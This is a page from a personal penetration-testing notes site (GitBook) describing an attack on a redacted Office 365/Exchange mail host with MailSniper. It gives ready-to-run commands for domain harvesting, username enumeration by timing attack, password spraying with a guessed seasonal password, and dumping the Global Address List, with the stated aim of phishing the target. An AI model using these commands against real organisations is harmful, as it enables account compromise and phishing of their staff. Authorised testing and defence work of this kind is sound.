Programmerboy Pentesting Stuff
  • Welcome
  • Web Pentesting Stuff
    • Pentesting Port 80,443
      • FFUF Commands
      • Virtual Host Scanning
      • Javascript DeObfuscation
      • Pentesting JWT (JSON Web Tokens)
      • Pentesting Graphql
      • Pentesting Redis 6379
  • CMS Pentesting
    • Wordpress Pentesting
    • Jenkins
    • Grafana
  • Network Penetration Testing
    • Nmap Commands
    • 53 - Pentesting DNS
    • 88 - Pentesting Kerberos
    • 111 - Pentesting RPC
    • 389 - Pentesting LDAP
    • 445 - Pentesting SMB
    • 873 - Pentesting Rsync
    • 1433 - Pentesting MSSQL
    • 2049 - Pentesting NFS
    • 3389 Pentesting RDP
    • 3306 - Pentesting Mysql
    • 5000 - Pentesting Docker Registry
  • Active Directory Pentesting
    • Methodology
  • Password and Bruteforce Attacks
    • Hydra
    • Cewl
    • Making Custom Wordlists (Usernames)
    • JSON to txt Wordlist
  • Linux Privilege Escalation
    • Getting a Fully Interactive TTY Shell
    • Docker Container Escape
  • Windows Privilege Escalation
    • Tunneling and Pivoting
    • Methodology
  • Bug Bounty
    • Bug Bounty Methodology
    • XSS
    • SQL Injection
    • Command Injection
    • File Upload Pentesting
    • Local and Remote File Inclusion
    • Broken Authentication
    • Server Side Request Forgery (SSRF)
    • XML External Entity (XXE)
    • Server Side Template Injection (SSTI)
    • ReconFTW (six2dez)
    • JS Files
    • SignUp Page
  • CTFs
    • WEB
    • Regex Bypass
    • Grep & Regex & Find strings
  • Python Programs for Pentesting
    • Python Code Snippets
  • Certifications-Notes
    • CRTO & Cobalt Strike
  • Phishing and Real World Stuff
    • Email Spoofing
    • Attacking Office 365 & Exchange
  • Cloud Pentesting
    • Enumeration
  • CVEs
    • Simplehelp CVE-2024-57727
    • Next.js CVE-2025-29927
Powered by GitBook
On this page
  1. Phishing and Real World Stuff

Attacking Office 365 & Exchange

PreviousEmail SpoofingNextEnumeration

Last updated 10 months ago

In this Case scenario i have a subdomain that is mail.redacted.io, i will now password spray against this domain so that i can phish the target, for this i will use MailSniper

Enumerate the NetBIOS name of the target domain with Invoke-DomainHarvestOWA.

Invoke-DomainHarvestOWA -ExchHostname mail.redacted.io

now we need to find the valid usernames so we can do username enumeration, you can find it by alot of methods like public website or hunter.io, now we will start our attack on the mail subdomain, Invoke-UsernameHarvestOWA uses a timing attack to validate which (if any) of these usernames are valid.

Invoke-UsernameHarvestOWA -ExchHostname mail.redacted.io -Domain redacted.io -UserList .\Desktop\possible.txt -OutFile .\Desktop\valid.txt

we have found 3 valid usernames now we will try to password spray as well using mailsniper and we will use the password of Summer2022 just to test because alot of organizations are using the default password

Invoke-PasswordSprayOWA -ExchHostname mail.redacted.io -UserList .\Desktop\valid.txt -Password Summer2022

now we have the valid username and password so we need to enumerate some more information from these valid credentials

so we will try to download the GAL list which is GLOABL ADDRESS LIST that contains the list of emails and some other potential data

Get-GlobalAddressList -ExchHostname mail.redacted.io -UserName redacted.io\iyates -Password Summer2022 -OutFile .\Desktop\gal.txt
GitHub - dafthack/MailSniper: MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used as a non-administrative user to search their own email, or by an administrator to search the mailboxes of every user in a domain.GitHub
Logo